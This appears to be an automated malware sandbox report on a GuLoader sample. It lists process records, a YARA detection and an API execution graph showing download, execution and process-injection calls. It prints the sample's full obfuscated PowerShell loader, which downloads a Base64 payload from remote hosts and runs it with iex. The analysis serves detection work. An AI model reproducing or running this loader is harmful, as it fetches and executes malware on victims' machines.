aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
                                                                  Imagebase:0x350000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:8
                                                                  Start time:09:47:05
                                                                  Start date:26/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:9
                                                                  Start time:09:47:06
                                                                  Start date:26/07/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                                                                  Imagebase:0x1c0000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:09:47:27
                                                                  Start date:26/07/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
                                                                  Imagebase:0x350000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.4571603039.000000000A795000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:12
                                                                  Start time:09:47:27
                                                                  Start date:26/07/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                                                                  Imagebase:0x1c0000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:5%
                                                                    Dynamic/Decrypted Code Coverage:3.6%
                                                                    Signature Coverage:22.2%
                                                                    Total number of Nodes:1925
                                                                    Total number of Limit Nodes:65
                                                                    execution_graph 52825 415ef1 52850 408b64 52825->52850 52829 415f08 52858 4020f6 52829->52858 52832 401e65 22 API calls 52833 415f1e 52832->52833 52834 4020f6 28 API calls 52833->52834 52835 415f29 52834->52835 52836 401e65 22 API calls 52835->52836 52837 415f34 52836->52837 52838 4020f6 28 API calls 52837->52838 52839 415f3f 52838->52839 52864 406e07 52839->52864 52843 415f57 52894 401e8d 52843->52894 52847 41709e 52848 401fd8 11 API calls 52847->52848 52849 4170aa 52848->52849 52903 4046f7 52850->52903 52853 401e65 52854 401e6d 52853->52854 52855 401e75 52854->52855 52937 402158 22 API calls 52854->52937 52855->52829 52859 40210c 52858->52859 52860 4023ce 11 API calls 52859->52860 52861 402126 52860->52861 52938 402569 52861->52938 52863 402134 52863->52832 52865 40482d 3 API calls 52864->52865 52866 406e16 52865->52866 52975 4048c8 connect 52866->52975 52870 406e3d 53040 402f10 52870->53040 52873 402f10 28 API calls 52874 406e53 52873->52874 52875 402f10 28 API calls 52874->52875 52876 406e5d 52875->52876 53045 404aa1 52876->53045 52879 401fd8 11 API calls 52880 406e72 52879->52880 52881 401fd8 11 API calls 52880->52881 52882 406e7a 52881->52882 52883 401fd8 11 API calls 52882->52883 52884 406e82 52883->52884 53060 404c10 52884->53060 52886 406e90 52887 401fd8 11 API calls 52886->52887 52888 406e98 52887->52888 52889 401fd8 11 API calls 52888->52889 52890 406ea0 52889->52890 52891 401fd8 11 API calls 52890->52891 52892 406ea8 52891->52892 52893 408b72 99 API calls 52892->52893 52893->52843 52895 402163 52894->52895 52896 40219f 52895->52896 54065 402730 11 API calls 52895->54065 52900 401fd8 52896->52900 52898 402184 54066 402712 11 API calls std::_Deallocate 52898->54066 52901 4023ce 11 API calls 52900->52901 52902 401fe1 52901->52902 52902->52847 52910 4020df 52903->52910 52906 4020df 11 API calls 52907 40471e 52906->52907 52908 404736 52907->52908 52914 40482d 52907->52914 52908->52853 52911 4020e7 52910->52911 52921 4023ce 52911->52921 52913 4020f2 52913->52906 52915 404846 socket 52914->52915 52916 404839 52914->52916 52917 404860 CreateEventW 52915->52917 52918 404842 52915->52918 52936 40489e WSAStartup 52916->52936 52917->52908 52918->52908 52920 40483e 52920->52915 52920->52918 52922 402428 52921->52922 52923 4023d8 52921->52923 52922->52913 52923->52922 52925 4027a7 52923->52925 52926 402e21 52925->52926 52929 4016b4 52926->52929 52928 402e30 52928->52922 52930 4016c6 52929->52930 52931 4016cb 52929->52931 52935 43bd19 11 API calls _Atexit 52930->52935 52931->52930 52932 4016f3 52931->52932 52932->52928 52934 43bd18 52935->52934 52936->52920 52948 402888 52938->52948 52940 40257d 52941 402592 52940->52941 52942 4025a7 52940->52942 52953 402a34 22 API calls 52941->52953 52955 4028e8 52942->52955 52945 40259b 52954 4029da 22 API calls 52945->52954 52947 4025a5 52947->52863 52949 402890 52948->52949 52950 402898 52949->52950 52966 402ca3 22 API calls 52949->52966 52950->52940 52953->52945 52954->52947 52956 4028f1 52955->52956 52957 402953 52956->52957 52958 4028fb 52956->52958 52973 4028a4 22 API calls 52957->52973 52961 402917 52958->52961 52962 402904 52958->52962 52964 402915 52961->52964 52965 4023ce 11 API calls 52961->52965 52967 402cae 52962->52967 52964->52947 52965->52964 52968 402cb8 __EH_prolog 52967->52968 52974 402e54 22 API calls 52968->52974 52970 4023ce 11 API calls 52972 402d92 52970->52972 52971 402d24 52971->52970 52972->52964 52974->52971 52976 404a1b 52975->52976 52977 4048ee 52975->52977 52978 404a21 WSAGetLastError 52976->52978 53028 40497e 52976->53028 52979 404923 52977->52979 52977->53028 53078 40531e 52977->53078 52980 404a31 52978->52980 52978->53028 53113 420c60 27 API calls 52979->53113 52982 404932 52980->52982 52983 404a36 52980->52983 52988 402093 28 API calls 52982->52988 53118 41cae1 30 API calls 52983->53118 52985 40490f 53083 402093 52985->53083 52987 40492b 52987->52982 52991 404941 52987->52991 52992 404a80 52988->52992 52990 404a40 53119 4052fd 28 API calls 52990->53119 52998 404950 52991->52998 52999 404987 52991->52999 52995 402093 28 API calls 52992->52995 53000 404a8f 52995->53000 53002 402093 28 API calls 52998->53002 53115 421a40 54 API calls 52999->53115 53003 41b4ef 80 API calls 53000->53003 53006 40495f 53002->53006 53003->53028 53009 402093 28 API calls 53006->53009 53007 40498f 53010 4049c4 53007->53010 53011 404994 53007->53011 53015 40496e 53009->53015 53117 420e06 28 API calls 53010->53117 53013 402093 28 API calls 53011->53013 53017 4049a3 53013->53017 53018 41b4ef 80 API calls 53015->53018 53020 402093 28 API calls 53017->53020 53033 404973 53018->53033 53019 4049cc 53021 4049f9 CreateEventW CreateEventW 53019->53021 53023 402093 28 API calls 53019->53023 53022 4049b2 53020->53022 53021->53028 53024 41b4ef 80 API calls 53022->53024 53026 4049e2 53023->53026 53027 4049b7 53024->53027 53029 402093 28 API calls 53026->53029 53116 4210b2 52 API calls 53027->53116 53035 402f31 53028->53035 53031 4049f1 53029->53031 53032 41b4ef 80 API calls 53031->53032 53034 4049f6 53032->53034 53114 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53033->53114 53034->53021 53036 4020df 11 API calls 53035->53036 53037 402f3d 53036->53037 53038 4032a0 28 API calls 53037->53038 53039 402f59 53038->53039 53039->52870 53177 401fb0 53040->53177 53042 402f1e 53043 402055 11 API calls 53042->53043 53044 402f2d 53043->53044 53044->52873 53046 404ab4 53045->53046 53180 40520c 53046->53180 53048 404ac9 _Yarn 53049 404b40 WaitForSingleObject 53048->53049 53050 404b20 53048->53050 53052 404b56 53049->53052 53051 404b32 send 53050->53051 53053 404b7b 53051->53053 53186 42103a 54 API calls 53052->53186 53056 401fd8 11 API calls 53053->53056 53055 404b69 SetEvent 53055->53053 53057 404b83 53056->53057 53058 401fd8 11 API calls 53057->53058 53059 404b8b 53058->53059 53059->52879 53061 4020df 11 API calls 53060->53061 53062 404c27 53061->53062 53063 4020df 11 API calls 53062->53063 53073 404c30 53063->53073 53068 404ca1 53246 404e26 99 API calls 53068->53246 53070 401fd8 11 API calls 53070->53073 53071 404ca8 53072 401fd8 11 API calls 53071->53072 53074 404cb1 53072->53074 53073->53068 53073->53070 53204 43bd51 53073->53204 53211 404b96 53073->53211 53217 4020b7 53073->53217 53223 401fe2 53073->53223 53232 404cc3 53073->53232 53075 401fd8 11 API calls 53074->53075 53076 404cba 53075->53076 53076->52886 53079 4020df 11 API calls 53078->53079 53080 40532a 53079->53080 53120 4032a0 53080->53120 53082 405346 53082->52985 53084 40209b 53083->53084 53085 4023ce 11 API calls 53084->53085 53086 4020a6 53085->53086 53124 4024ed 53086->53124 53089 41b4ef 53090 41b5a0 53089->53090 53091 41b505 GetLocalTime 53089->53091 53093 401fd8 11 API calls 53090->53093 53092 40531e 28 API calls 53091->53092 53094 41b547 53092->53094 53095 41b5a8 53093->53095 53135 406383 53094->53135 53097 401fd8 11 API calls 53095->53097 53099 41b5b0 53097->53099 53099->52979 53100 402f10 28 API calls 53101 41b55f 53100->53101 53102 406383 28 API calls 53101->53102 53103 41b56b 53102->53103 53140 407200 77 API calls 53103->53140 53105 41b579 53106 401fd8 11 API calls 53105->53106 53107 41b585 53106->53107 53108 401fd8 11 API calls 53107->53108 53109 41b58e 53108->53109 53110 401fd8 11 API calls 53109->53110 53111 41b597 53110->53111 53112 401fd8 11 API calls 53111->53112 53112->53090 53113->52987 53114->53028 53115->53007 53116->53033 53117->53019 53118->52990 53122 4032aa 53120->53122 53121 4032c9 53121->53082 53122->53121 53123 4028e8 28 API calls 53122->53123 53123->53121 53125 4024f9 53124->53125 53128 40250a 53125->53128 53127 4020b1 53127->53089 53129 40251a 53128->53129 53130 402535 53129->53130 53131 402520 53129->53131 53132 4028e8 28 API calls 53130->53132 53133 402569 28 API calls 53131->53133 53134 402533 53132->53134 53133->53134 53134->53127 53141 4051ef 53135->53141 53137 406391 53145 402055 53137->53145 53140->53105 53142 4051fb 53141->53142 53151 405274 53142->53151 53144 405208 53144->53137 53146 402061 53145->53146 53147 4023ce 11 API calls 53146->53147 53148 40207b 53147->53148 53173 40267a 53148->53173 53152 405282 53151->53152 53153 405288 53152->53153 53154 40529e 53152->53154 53162 4025f0 53153->53162 53156 4052f5 53154->53156 53157 4052b6 53154->53157 53171 4028a4 22 API calls 53156->53171 53160 4028e8 28 API calls 53157->53160 53161 40529c 53157->53161 53160->53161 53161->53144 53163 402888 22 API calls 53162->53163 53164 402602 53163->53164 53165 402672 53164->53165 53166 402629 53164->53166 53172 4028a4 22 API calls 53165->53172 53169 4028e8 28 API calls 53166->53169 53170 40263b 53166->53170 53169->53170 53170->53161 53174 40268b 53173->53174 53175 4023ce 11 API calls 53174->53175 53176 40208d 53175->53176 53176->53100 53178 4025f0 28 API calls 53177->53178 53179 401fbd 53178->53179 53179->53042 53181 405214 53180->53181 53182 4023ce 11 API calls 53181->53182 53183 40521f 53182->53183 53187 405234 53183->53187 53185 40522e 53185->53048 53186->53055 53188 405240 53187->53188 53189 40526e 53187->53189 53190 4028e8 28 API calls 53188->53190 53203 4028a4 22 API calls 53189->53203 53193 40524a 53190->53193 53193->53185 53209 446137 __Getctype 53204->53209 53205 446175 53248 4405dd 20 API calls __dosmaperr 53205->53248 53207 446160 RtlAllocateHeap 53208 446173 53207->53208 53207->53209 53208->53073 53209->53205 53209->53207 53247 442f80 7 API calls 2 library calls 53209->53247 53212 404ba0 WaitForSingleObject 53211->53212 53213 404bcd recv 53211->53213 53249 421076 54 API calls 53212->53249 53215 404be0 53213->53215 53215->53073 53216 404bbc SetEvent 53216->53215 53218 4020bf 53217->53218 53219 4023ce 11 API calls 53218->53219 53220 4020ca 53219->53220 53221 40250a 28 API calls 53220->53221 53222 4020d9 53221->53222 53222->53073 53224 401ff1 53223->53224 53231 402039 53223->53231 53225 4023ce 11 API calls 53224->53225 53226 401ffa 53225->53226 53227 40203c 53226->53227 53229 402015 53226->53229 53228 40267a 11 API calls 53227->53228 53228->53231 53250 403098 28 API calls 53229->53250 53231->53073 53233 4020df 11 API calls 53232->53233 53242 404cde 53233->53242 53234 404e13 53235 401fd8 11 API calls 53234->53235 53236 404e1c 53235->53236 53236->53073 53237 4041a2 28 API calls 53237->53242 53238 401fe2 28 API calls 53238->53242 53239 4020f6 28 API calls 53239->53242 53242->53234 53242->53237 53242->53238 53242->53239 53243 401fd8 11 API calls 53242->53243 53251 406eb0 53242->53251 53322 41299f 53242->53322 53366 401fc0 53242->53366 53243->53242 53246->53071 53247->53209 53248->53208 53249->53216 53250->53231 53252 406ec4 53251->53252 53370 4041a2 53252->53370 53255 4020f6 28 API calls 53256 406ee8 53255->53256 53257 4020f6 28 API calls 53256->53257 53258 406ef7 53257->53258 53373 41be1b 53258->53373 53261 406f0b 53264 4070e6 53261->53264 53266 401e65 22 API calls 53261->53266 53262 40702e 53263 401e65 22 API calls 53262->53263 53265 40703a 53263->53265 53267 401e8d 11 API calls 53264->53267 53271 407052 53265->53271 53272 4070eb 53265->53272 53268 406f20 53266->53268 53269 407176 53267->53269 53276 406f38 53268->53276 53277 406fda 53268->53277 53270 401fd8 11 API calls 53269->53270 53273 40717f 53270->53273 53275 401e65 22 API calls 53271->53275 53274 401e65 22 API calls 53272->53274 53278 401fd8 11 API calls 53273->53278 53284 4070f1 53274->53284 53281 407059 53275->53281 53282 401e65 22 API calls 53276->53282 53280 401e65 22 API calls 53277->53280 53279 407187 53278->53279 53279->53242 53288 406fe0 53280->53288 53285 401e65 22 API calls 53281->53285 53283 406f3f 53282->53283 53286 401e65 22 API calls 53283->53286 53284->53264 53287 401e65 22 API calls 53284->53287 53289 40706d 53285->53289 53290 406f53 53286->53290 53291 407114 53287->53291 53288->53264 53292 401e65 22 API calls 53288->53292 53294 40da34 32 API calls 53289->53294 53395 40da34 53290->53395 53460 41b9f6 22 API calls 2 library calls 53291->53460 53293 406ffe 53292->53293 53454 418568 53293->53454 53295 407080 53294->53295 53302 401e65 22 API calls 53295->53302 53298 406f66 53306 401e65 22 API calls 53298->53306 53299 407126 53301 418568 31 API calls 53299->53301 53303 407011 53299->53303 53301->53303 53304 407097 53302->53304 53305 402093 28 API calls 53303->53305 53309 40709e URLDownloadToFileW 53304->53309 53307 407160 53305->53307 53308 406f7c 53306->53308 53310 404aa1 61 API calls 53307->53310 53453 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile FindCloseChangeNotification 53308->53453 53312 406f85 53309->53312 53313 406fd0 53309->53313 53310->53264 53312->53313 53314 401e65 22 API calls 53312->53314 53315 402093 28 API calls 53313->53315 53319 406f98 53314->53319 53316 4070d0 53315->53316 53317 404aa1 61 API calls 53316->53317 53318 4070dd 53317->53318 53457 401f09 53318->53457 53319->53313 53321 406fb5 ShellExecuteW 53319->53321 53321->53313 53323 4129b1 53322->53323 53324 4041a2 28 API calls 53323->53324 53325 4129c4 53324->53325 53326 4020f6 28 API calls 53325->53326 53327 4129d3 53326->53327 53328 4020f6 28 API calls 53327->53328 53329 4129e2 53328->53329 53330 41be1b 28 API calls 53329->53330 53331 4129eb 53330->53331 53332 412a93 53331->53332 53334 401e65 22 API calls 53331->53334 53333 401e8d 11 API calls 53332->53333 53335 412a9c 53333->53335 53336 412a02 53334->53336 53337 401fd8 11 API calls 53335->53337 53338 4020f6 28 API calls 53336->53338 53339 412aa5 53337->53339 53340 412a0d 53338->53340 53342 401fd8 11 API calls 53339->53342 53341 401e65 22 API calls 53340->53341 53343 412a18 53341->53343 53344 412aad 53342->53344 53345 4020f6 28 API calls 53343->53345 53344->53242 53346 412a23 53345->53346 53347 401e65 22 API calls 53346->53347 53348 412a2e 53347->53348 53349 4020f6 28 API calls 53348->53349 53350 412a39 53349->53350 53351 401e65 22 API calls 53350->53351 53352 412a44 53351->53352 53353 4020f6 28 API calls 53352->53353 53354 412a4f 53353->53354 53355 401e65 22 API calls 53354->53355 53356 412a5a 53355->53356 53357 4020f6 28 API calls 53356->53357 53358 412a65 53357->53358 53359 401e65 22 API calls 53358->53359 53360 412a73 53359->53360 53361 4020f6 28 API calls 53360->53361 53362 412a7e 53361->53362 53618 412ab4 GetModuleFileNameW 53362->53618 53367 401fd2 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 53366->53367 53368 401fc9 53366->53368 53367->53242 53924 415aea 53367->53924 53923 4025e0 28 API calls 53368->53923 53461 40423a 53370->53461 53374 4020df 11 API calls 53373->53374 53394 41be2e 53374->53394 53375 41be9e 53376 401fd8 11 API calls 53375->53376 53377 41bed0 53376->53377 53379 401fd8 11 API calls 53377->53379 53378 41bea0 53381 4041a2 28 API calls 53378->53381 53380 41bed8 53379->53380 53383 401fd8 11 API calls 53380->53383 53384 41beac 53381->53384 53382 4041a2 28 API calls 53382->53394 53385 406f00 53383->53385 53386 401fe2 28 API calls 53384->53386 53385->53261 53385->53262 53388 41beb5 53386->53388 53387 401fe2 28 API calls 53387->53394 53389 401fd8 11 API calls 53388->53389 53391 41bebd 53389->53391 53390 401fd8 11 API calls 53390->53394 53392 41ce34 28 API calls 53391->53392 53392->53375 53394->53375 53394->53378 53394->53382 53394->53387 53394->53390 53467 41ce34 53394->53467 53492 401f86 53395->53492 53398 40da70 53517 41b5b4 29 API calls 53398->53517 53399 40da66 53401 40db99 GetLongPathNameW 53399->53401 53400 40daa5 53527 41bfb7 53400->53527 53496 40417e 53401->53496 53406 40da79 53518 401f13 53406->53518 53408 40db00 53412 40417e 28 API calls 53408->53412 53409 40daae 53413 40417e 28 API calls 53409->53413 53411 40417e 28 API calls 53415 40dbbd 53411->53415 53416 40db0e 53412->53416 53417 40dabc 53413->53417 53414 40da83 53418 401f09 11 API calls 53414->53418 53502 40ddd1 53415->53502 53422 40417e 28 API calls 53416->53422 53423 40417e 28 API calls 53417->53423 53418->53399 53425 40db24 53422->53425 53426 40dad2 53423->53426 53428 402fa5 28 API calls 53425->53428 53429 402fa5 28 API calls 53426->53429 53427 402fa5 28 API calls 53431 40dbe5 53427->53431 53432 40db2f 53428->53432 53430 40dadd 53429->53430 53434 401f13 28 API calls 53430->53434 53435 401f09 11 API calls 53431->53435 53433 401f13 28 API calls 53432->53433 53436 40db3a 53433->53436 53437 40dae8 53434->53437 53438 40dbef 53435->53438 53440 401f09 11 API calls 53436->53440 53441 401f09 11 API calls 53437->53441 53439 401f09 11 API calls 53438->53439 53442 40dbf8 53439->53442 53443 40db43 53440->53443 53444 40daf1 53441->53444 53445 401f09 11 API calls 53442->53445 53446 401f09 11 API calls 53443->53446 53447 401f09 11 API calls 53444->53447 53448 40dc01 53445->53448 53446->53414 53447->53414 53449 401f09 11 API calls 53448->53449 53450 40dc0a 53449->53450 53451 401f09 11 API calls 53450->53451 53452 40dc13 53451->53452 53452->53298 53453->53312 53597 4180ef 53454->53597 53458 402252 11 API calls 53457->53458 53459 401f12 53458->53459 53459->53264 53460->53299 53462 404243 53461->53462 53463 4023ce 11 API calls 53462->53463 53464 40424e 53463->53464 53465 402569 28 API calls 53464->53465 53466 4041b5 53465->53466 53466->53255 53468 41ce41 53467->53468 53469 41ce51 53468->53469 53470 41cea0 53468->53470 53474 41ce89 53469->53474 53478 41cfe0 28 API calls 53469->53478 53472 41ceba 53470->53472 53483 41cfe0 28 API calls 53470->53483 53473 41d146 28 API calls 53472->53473 53475 41ce9c 53473->53475 53479 41d146 53474->53479 53475->53394 53478->53474 53480 41d14f 53479->53480 53484 41d1f2 53480->53484 53483->53472 53485 41d1fb 53484->53485 53488 41d2a0 53485->53488 53489 41d2ab 53488->53489 53490 41d159 53489->53490 53491 4020f6 28 API calls 53489->53491 53490->53475 53491->53490 53493 401f8e 53492->53493 53531 402252 53493->53531 53495 401f99 53495->53398 53495->53399 53495->53400 53497 404186 53496->53497 53498 402252 11 API calls 53497->53498 53499 404191 53498->53499 53536 4041bc 53499->53536 53503 40ddd9 53502->53503 53504 402252 11 API calls 53503->53504 53505 40dde4 53504->53505 53506 4041d9 28 API calls 53505->53506 53507 40dbd0 53506->53507 53508 402fa5 53507->53508 53509 402fb4 53508->53509 53510 402ff6 53509->53510 53515 402feb 53509->53515 53579 40323f 53510->53579 53512 402ff4 53572 403262 53512->53572 53578 403211 28 API calls 53515->53578 53517->53406 53519 401f22 53518->53519 53526 401f6a 53518->53526 53520 402252 11 API calls 53519->53520 53521 401f2b 53520->53521 53522 401f6d 53521->53522 53524 401f46 53521->53524 53523 402336 11 API calls 53522->53523 53523->53526 53596 40305c 28 API calls 53524->53596 53526->53414 53528 41bfc4 GetCurrentProcess IsWow64Process 53527->53528 53529 40daaa 53527->53529 53528->53529 53530 41bfdb 53528->53530 53529->53408 53529->53409 53530->53529 53532 4022ac 53531->53532 53533 40225c 53531->53533 53532->53495 53533->53532 53535 402779 11 API calls std::_Deallocate 53533->53535 53535->53532 53537 4041c8 53536->53537 53540 4041d9 53537->53540 53539 40419c 53539->53411 53541 4041e9 53540->53541 53542 404206 53541->53542 53543 4041ef 53541->53543 53557 4027e6 53542->53557 53547 404267 53543->53547 53546 404204 53546->53539 53548 402888 22 API calls 53547->53548 53549 40427b 53548->53549 53550 404290 53549->53550 53551 4042a5 53549->53551 53568 4042df 22 API calls 53550->53568 53552 4027e6 28 API calls 53551->53552 53555 4042a3 53552->53555 53554 404299 53569 402c48 22 API calls 53554->53569 53555->53546 53558 4027ef 53557->53558 53559 402851 53558->53559 53560 4027f9 53558->53560 53571 4028a4 22 API calls 53559->53571 53563 402802 53560->53563 53564 402815 53560->53564 53570 402aea 28 API calls __EH_prolog 53563->53570 53566 402813 53564->53566 53567 402252 11 API calls 53564->53567 53566->53546 53567->53566 53568->53554 53569->53555 53570->53566 53573 40326e 53572->53573 53574 402252 11 API calls 53573->53574 53575 403288 53574->53575 53582 402336 53575->53582 53578->53512 53586 4036a6 53579->53586 53581 40324c 53581->53512 53583 402347 53582->53583 53584 402252 11 API calls 53583->53584 53585 4023c7 53584->53585 53585->53427 53587 402888 22 API calls 53586->53587 53588 4036b9 53587->53588 53589 40372c 53588->53589 53590 4036de 53588->53590 53595 4028a4 22 API calls 53589->53595 53593 4027e6 28 API calls 53590->53593 53594 4036f0 53590->53594 53593->53594 53594->53581 53596->53526 53598 41811c 8 API calls 53597->53598 53599 418189 ___scrt_get_show_window_mode 53598->53599 53617 418440 CloseHandle CloseHandle 53598->53617 53600 4181ef CreateProcessW 53599->53600 53599->53617 53601 418225 VirtualAlloc Wow64GetThreadContext 53600->53601 53602 41847a GetLastError 53600->53602 53603 418253 ReadProcessMemory 53601->53603 53604 418444 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 53601->53604 53602->53617 53603->53604 53605 418279 NtCreateSection 53603->53605 